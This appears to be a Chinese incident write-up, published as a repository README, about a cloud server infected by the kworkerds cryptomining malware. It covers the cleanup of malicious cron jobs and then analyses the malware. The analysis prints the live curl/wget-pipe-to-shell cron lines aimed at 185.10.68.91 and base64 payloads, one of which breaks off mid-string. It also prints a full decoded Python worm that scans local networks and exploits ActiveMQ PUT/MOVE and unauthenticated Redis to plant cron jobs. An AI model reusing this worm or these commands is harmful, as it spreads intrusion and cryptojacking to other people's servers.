1 Star 1 Fork 1

reggie / 记录一次kworkerds挖矿入侵

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
贡献代码
同步代码
取消
提示: 由于 Git 不支持空文件夾,创建文件夹后会生成空的 .keep 文件
Loading...
README

0x01 开始

刚买的腾讯云服务器不久,发现用xshell登不上去,然后使用腾讯提供的web界面也登陆不上去。后来重启服务器,终于登陆上去。不过进去一会儿,服务器便卡的不行,使用htop发现 cpu 100%

资源全被 root 用户 /tmp/kworderds 占用了 切换到root用户 crontab -l

发现一个可疑定时任务 进入/var/spool/cron目录,有这两个文件

crontabs 文件中也有个root文件 root文件中就是这个定时任务了

尝试去删掉这个root文件和crontabs文件夹

what?不能删除? 百度下发现问题,lsattr

文件被保护了,chattr -i 去掉文件的 i 权限,文件顺利删除(crontabs文件也是同样问题) 不过一会后这个定时脚本又自动生成出来了(what fk!)

再去检查下/etc/cron.d 文件夹下看看有什么问题

果然,这个文件也被修改了 干掉apacheroot 注意 0hourly最后一句,01 * * * * root run-parts /etc/cron.hourly 然后,我立马想到,这也应该被人改了

果不其然。干掉

其他文件中也有同样的问题 (只有cron.weekly没被修改) 百度一下其他大佬。然后清空/tmp 目录(因为是新服务器, 所以没什么重要东西) ps aux|grep kworkerds | awk '{print $2}' | xargs kill -9 干掉 所有kworkerds进程 等了一会后病毒没有发作,应该是成功了

然后隔了一天又出来了 ps aux|grep python


0x02 下面来解析下病毒到低做了些什么

  1. 定时任务中的 http://185.10.68.91/1/1
    (curl -fsSL http://185.10.68.91/raw/68VYMp5T || wget -q -O-http://185.10.68.91/raw/68VYMp5T)|base64 -d |/bin/bash
  2. 返回了类似的参数,那我们再次请求下http://185.10.68.91/raw/68VYMp5T
    IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKaW1wb3J0IG9zCgpJUF9MSVNUID0gW10KCmNsYXNzIHNjYW5uZXIodGhyZWFkaW5nLlRocmVhZCk6CiAgICB0bGlzdCA9IFtdCiAgICBtYXh0aHJlYWRzID0gMTAwCiAgICBldm50ID0gdGhyZWFkaW5nLkV2ZW50KCkKICAgIGxjayA9IHRocmVhZGluZy5Mb2NrKCkKCiAgICBkZWYgX19pbml0X18oc2VsZixob3N0KToKICAgICAgICB0aHJlYWRpbmcuVGhyZWFkLl9faW5pdF9fKHNlbGYpCiAgICAgICAgc2VsZi5ob3N0ID0gaG9zdAogICAgZGVmIHJ1bihzZWxmKToKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgICAgIHMuc2V0dGltZW91dCgyKQogICAgICAgICAgICBzLmNvbm5lY3RfZXgoKHNlbGYuaG9zdCwgODE2MSkpCiAgICAgICAgICAgIHMuc2VuZCgnZ29vZ2xlIHNwaWRlclxyXG4nKQogICAgICAgICAgICByZXN1bHRzID0gcy5yZWN2KDEpCiAgICAgICAgICAgIGlmIHN0cihyZXN1bHRzKToKICAgICAgICAgICAgICAgIGRhdGEgPSAiKi8xMCAqICogKiAqIHJvb3QgKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBkYXRhMiA9ICIqLzE1ICogKiAqICogKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbihzZWxmLmhvc3QsIHBvcnQ9ODE2MSwgdGltZW91dD0yKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBib2R5PWRhdGEpCiAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdQVVQnLCB1cmw9Jy9maWxlc2VydmVyL2dvYS50eHQnLCBib2R5PWRhdGEyKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nb2IudHh0JywgYm9keT1kYXRhMikKICAgICAgICAgICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgICAgICBpZiByZXN1bHQuc3RhdHVzID09IDIwNDoKICAgICAgICAgICAgICAgICAgICBoZWFkZXJzID0geydEZXN0aW5hdGlvbic6ICdmaWxlOi8vL2V0Yy9jcm9uLmQvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczIgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczMgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgY29ubiA9IGh0dHBsaWIuSFRUUENvbm5lY3Rpb24oc2VsZi5ob3N0LCBwb3J0PTgxNjEsIHRpbWVvdXQ9MikKICAgICAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdNT1ZFJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBoZWFkZXJzPWhlYWRlcnMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29hLnR4dCcsIGhlYWRlcnM9aGVhZGVyczIpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29iLnR4dCcsIGhlYWRlcnM9aGVhZGVyczMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMyID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgICAgICBzMi5zZXR0aW1lb3V0KDIpCiAgICAgICAgICAgIHggPSBzMi5jb25uZWN0X2V4KChzZWxmLmhvc3QsIDYzNzkpKQogICAgICAgICAgICBpZiB4ID09IDA6CiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciBub1xyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnZmx1c2hhbGxcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2NvbmZpZyBzZXQgZGJmaWxlbmFtZSByb290XHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzZXQgU3dFM1NDICJcXHRcXG4qLzEwICogKiAqICogcm9vdCAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VHx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVQpfHNoXFxuXFx0IlxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2V0IE55c1g3RCAiXFx0XFxuKi8xNSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VCl8c2hcXG5cXHQiXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvZXRjL2Nyb24uZFxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2F2ZVxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnY29uZmlnIHNldCBkaXIgL3Zhci9zcG9vbC9jcm9uXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnNcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ3NhdmVcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2ZsdXNoYWxsXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciB5ZXNcclxuJykKICAgICAgICAgICAgczIuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMSA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMxID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAxKVswXQogICAgICAgIGZvciB1IGluIHJhbmdlKDAsIDI1Nik6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczEgKyAoc3RyKHUpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU2KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGlwMiA9IG9zLnBvcGVuKCIvc2Jpbi9pZmNvbmZpZyAtYXxncmVwIGluZXR8Z3JlcCAtdiAxMjcuMC4wLjF8Z3JlcCAtdiBpbmV0Nnxhd2sgJ3twcmludCAkMn0nfHRyIC1kIFwiYWRkcjpcIiIpLnJlYWRsaW5lKCkucnN0cmlwKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QyID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QyICsgJy4nICsgKHN0cihnKSkpCiAgICAgICAgcGFzcwoKZGVmIHJ1blBvcnRzY2FuKCk6CiAgICBnZXRfaXBfbGlzdCgpCiAgICBmb3IgaG9zdCBpbiBJUF9MSVNUOgogICAgICAgIHNjYW5uZXIubGNrLmFjcXVpcmUoKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA+PSBzY2FubmVyLm1heHRocmVhZHM6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgICAgICBzY2FubmVyLmV2bnQud2FpdCgpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCiAgICAgICAgc2Nhbm5lci5uZXd0aHJlYWQoaG9zdCkKICAgIGZvciB0IGluIHNjYW5uZXIudGxpc3Q6CiAgICAgICAgdC5qb2luKCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBydW5Qb3J0c2Nhbigp
    返回了些字母,1.中使用了base64, 我们猜测是base64编码
  3. 解密后
import threading
import socket
from re import findall
import httplib
import os

IP_LIST = []

class scanner(threading.Thread):
  tlist = []
  maxthreads = 100
  evnt = threading.Event()
  lck = threading.Lock()

  def __init__(self,host):
      threading.Thread.__init__(self)
      self.host = host
  def run(self):
      try:
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.settimeout(2)
          s.connect_ex((self.host, 8161))
          s.send('google spider\r\n')
          results = s.recv(1)
          if str(results):
              data = "*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##"
              data2 = "*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##"
              conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
              conn.request(method='PUT', url='/fileserver/go.txt', body=data)
              conn.request(method='PUT', url='/fileserver/goa.txt', body=data2)
              conn.request(method='PUT', url='/fileserver/gob.txt', body=data2)
              result = conn.getresponse()
              conn.close()
              if result.status == 204:
                  headers = {'Destination': 'file:///etc/cron.d/root'}
                  headers2 = {'Destination': 'file:///var/spool/cron/root'}
                  headers3 = {'Destination': 'file:///var/spool/cron/crontabs/root'}
                  conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
                  conn.request(method='MOVE', url='/fileserver/go.txt', headers=headers)
                  conn.request(method='MOVE', url='/fileserver/goa.txt', headers=headers2)
                  conn.request(method='MOVE', url='/fileserver/gob.txt', headers=headers3)
                  conn.close()
          s.close()
      except Exception:
          pass
      try:
          s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s2.settimeout(2)
          x = s2.connect_ex((self.host, 6379))
          if x == 0:
              s2.send('config set stop-writes-on-bgsave-error no\r\n')
              s2.send('flushall\r\n')
              s2.send('config set dbfilename root\r\n')
              s2.send('set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n')
              s2.send('set NysX7D "\\t\\n*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n')
              s2.send('config set dir /etc/cron.d\r\n')
              s2.send('save\r\n')
              s2.send('config set dir /var/spool/cron\r\n')
              s2.send('save\r\n')
              s2.send('config set dir /var/spool/cron/crontabs\r\n')
              s2.send('save\r\n')
              s2.send('flushall\r\n')
              s2.send('config set stop-writes-on-bgsave-error yes\r\n')
          s2.close()
      except Exception:
          pass
      scanner.lck.acquire()
      scanner.tlist.remove(self)
      if len(scanner.tlist) < scanner.maxthreads:
          scanner.evnt.set()
          scanner.evnt.clear()
      scanner.lck.release()

  def newthread(host):
      scanner.lck.acquire()
      sc = scanner(host)
      scanner.tlist.append(sc)
      scanner.lck.release()
      sc.start()

  newthread = staticmethod(newthread)

def get_ip_list():
  try:
      url = 'ident.me'
      conn = httplib.HTTPConnection(url, port=80, timeout=10)
      conn.request(method='GET', url='/', )
      result = conn.getresponse()
      ip1 = result.read()
      ips1 = findall(r'\d+.\d+.', ip1)[0]
      for u in range(0, 256):
          ip_list1 = (ips1 + (str(u)))
          for g in range(1, 256):
              IP_LIST.append(ip_list1 + '.' + (str(g)))
  except Exception:
      ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
      ips2 = findall(r'\d+.\d+.', ip2)[0]
      for i in range(0, 255):
          ip_list2 = (ips2 + (str(i)))
          for g in range(1, 255):
              IP_LIST.append(ip_list2 + '.' + (str(g)))
      pass

def runPortscan():
  get_ip_list()
  for host in IP_LIST:
      scanner.lck.acquire()
      if len(scanner.tlist) >= scanner.maxthreads:
          scanner.lck.release()
          scanner.evnt.wait()
      else:
          scanner.lck.release()
      scanner.newthread(host)
  for t in scanner.tlist:
      t.join()

if __name__ == "__main__":
  runPortscan()
  1. 中间又出现了熟悉的网址 http://185.10.68.91/raw/68VYMp5T
IyEvYmluL2Jhc2gKU0hFTEw9L2Jpbi9zaApQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbgoKZnVuY3Rpb24gYigpIHsKcGtpbGwgd25US1lnICYmIHBraWxsIGRkZyogJiYgcm0gLXJmIC90bXAvZGRnKiAmJiBybSAtcmYgL3RtcC93blRLWWcKcm0gLXJmIC90bXAvcVczeFQuMiAvdG1wL2RkZ3MuMzAyMCAvdG1wL2RkZ3MuMzAyMCAvdG1wL3duVEtZZyAvdG1wLzJ0M2lrCnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtciIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieGlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJkZGdzIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJxVzN4VCIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAidDAwbHMucnUiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInN1c3RlcyIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgImNyYW5iZXJ5IiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJtaW5lcmQiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInduVEtZZyIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAidGhpc3h4cyIgfCBhd2sgJ3twcmludCAkMn0nIHwgeGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJoYXNoZmlzaCIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAvb3B0L3lpbHUvbXNlcnZpY2V8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgL3Vzci9iaW4vLnNzaGR8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIGh3bGgzd2xoNDRsaCB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIENpcmNsZV9NSSB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIGdldC5iaS1jaGkuY29tIHwgYXdrICd7cHJpbnQgJDJ9JyB8IHhhcmdzIGtpbGwgLTkKcHMgYXV4ZiB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgaGFzaHZhdWx0LnBybyB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIG5hbm9wb29sLm9yZyB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIC91c3IvYmluLy5zc2hkIHwgYXdrICd7cHJpbnQgJDJ9JyB8IHhhcmdzIGtpbGwgLTkKcHMgYXV4ZiB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgL3Vzci9iaW4vYnNkLXBvcnQgfCBhd2sgJ3twcmludCAkMn0nIHwgeGFyZ3Mga2lsbCAtOQpwPSQocHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCBrd29ya2VyZHN8d2MgLWwpCmlmIFsgJHtwfSAtZXEgMCBdO3RoZW4KCXBzIGF1eGZ8Z3JlcCAtdiBncmVwIHwgYXdrICd7aWYoJDM+PTgwLjApIHByaW50ICQyfSd8IHhhcmdzIGtpbGwgLTkKZmkKfQoKZnVuY3Rpb24gZCgpIHsKCUFSQ0g9JCh1bmFtZSAtaSkKCWlmIFsgIiRBUkNIIiA9PSAieDg2XzY0IiBdOyB0aGVuCgkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvMS8xNTUxNDM0NzYxeDI3MjgzMjkwNjQuanBnIC1vIC90bXAva3dvcmtlcmRzfHx3Z2V0IGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvMS8xNTUxNDM0NzYxeDI3MjgzMjkwNjQuanBnIC1PIC90bXAva3dvcmtlcmRzKSAmJiBjaG1vZCAreCAvdG1wL2t3b3JrZXJkcwoJCS90bXAva3dvcmtlcmRzCgllbHNlCgkJbWtkaXIgLXAgL3Zhci90bXAKCQljaG1vZCAxNzc3IC92YXIvdG1wCgkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvMi8xNTUxNDM0Nzc4eDI3MjgzMjkwMzIuanBnIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL21hc3Rlci5jbG1pbmVyLnJ1LzIvMTU1MTQzNDc3OHgyNzI4MzI5MDMyLmpwZyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNobW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwoJCS92YXIvdG1wL2t3b3JrZXJkcwoJZmkKfQoKZnVuY3Rpb24gZSgpIHsKCW5vaHVwIHB5dGhvbiAtYyAiaW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoJ0kyTnZaR2x1WnpvZ2RYUm1MVGdLYVcxd2IzSjBJSFZ5Ykd4cFlncHBiWEJ2Y25RZ1ltRnpaVFkwQ2dwa1BTQW5hSFIwY0Rvdkx6RTROUzR4TUM0Mk9DNDVNUzl5WVhjdk9UaHpaR1kyT1RFbkNuUnllVG9LSUNBZ0lIQmhaMlU5WW1GelpUWTBMbUkyTkdSbFkyOWtaU2gxY214c2FXSXVkWEpzYjNCbGJpaGtLUzV5WldGa0tDa3BDaUFnSUNCbGVHVmpLSEJoWjJVcENtVjRZMlZ3ZERvS0lDQWdJSEJoYzNNPScpKSIgPi9kZXYvbnVsbCAyPiYxICYKCXRvdWNoIC90bXAvLjM4dDlndWZ0MDA1NWQwNTY1dTQ0NGd0anIwCn0KCmZ1bmN0aW9uIGMoKSB7CgljaGF0dHIgLWkgL3Vzci9sb2NhbC9iaW4vZG5zIC9ldGMvY3Jvbi5kL3Jvb3QgL2V0Yy9jcm9uLmQvYXBhY2hlIC92YXIvc3Bvb2wvY3Jvbi9yb290IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290IC9ldGMvbGQuc28ucHJlbG9hZAoJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly8xODUuMTAuNjguOTEvMi8yIC1vIC91c3IvbG9jYWwvYmluL2Ruc3x8d2dldCBodHRwOi8vMTg1LjEwLjY4LjkxLzIvMiAtTyAvdXNyL2xvY2FsL2Jpbi9kbnMpICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2Jpbi9kbnMgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2Jpbi9kbnMgJiYgY2hhdHRyICtpIC91c3IvbG9jYWwvYmluL2RucwoJZWNobyAtZSAiU0hFTEw9L2Jpbi9zaFxuUEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpblxuTUFJTFRPPXJvb3RcbkhPTUU9L1xuIyBydW4tcGFydHNcbjAxICogKiAqICogcm9vdCBydW4tcGFydHMgL2V0Yy9jcm9uLmhvdXJseVxuMDIgNCAqICogKiByb290IHJ1bi1wYXJ0cyAvZXRjL2Nyb24uZGFpbHlcbjAgMSAqICogKiByb290IC91c3IvbG9jYWwvYmluL2RucyIgPiAvZXRjL2Nyb250YWIgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb250YWIKCWVjaG8gLWUgIiovMTAgKiAqICogKiByb290IChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24uZC9yb290ICYmIGNoYXR0ciAraSAvZXRjL2Nyb24uZC9yb290CgllY2hvIC1lICIqLzE3ICogKiAqICogcm9vdCAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMXx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS8xLzEpfHNoXG4jIyIgPiAvZXRjL2Nyb24uZC9hcGFjaGUgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24uZC9hcGFjaGUgJiYgY2hhdHRyICtpIC9ldGMvY3Jvbi5kL2FwYWNoZQoJZWNobyAtZSAiKi8yMyAqICogKiAqIChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSl8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9yb290ICYmIHRvdWNoIC1hY21yIC9iaW4vc2ggL3Zhci9zcG9vbC9jcm9uL3Jvb3QgJiYgY2hhdHRyICtpIC92YXIvc3Bvb2wvY3Jvbi9yb290Cglta2RpciAtcCAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMKCWVjaG8gLWUgIiovMzEgKiAqICogKiAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMXx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS8xLzEpfHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdCAmJiB0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290ICYmIGNoYXR0ciAraSAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdAoJbWtkaXIgLXAgL2V0Yy9jcm9uLmhvdXJseQoJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xIC1vIC9ldGMvY3Jvbi5ob3VybHkvb2FuYWNyb25lcnx8d2dldCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSAtTyAvZXRjL2Nyb24uaG91cmx5L29hbmFjcm9uZXIpICYmIGNobW9kIDc1NSAvZXRjL2Nyb24uaG91cmx5L29hbmFjcm9uZXIKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZzU0wgLS1jb2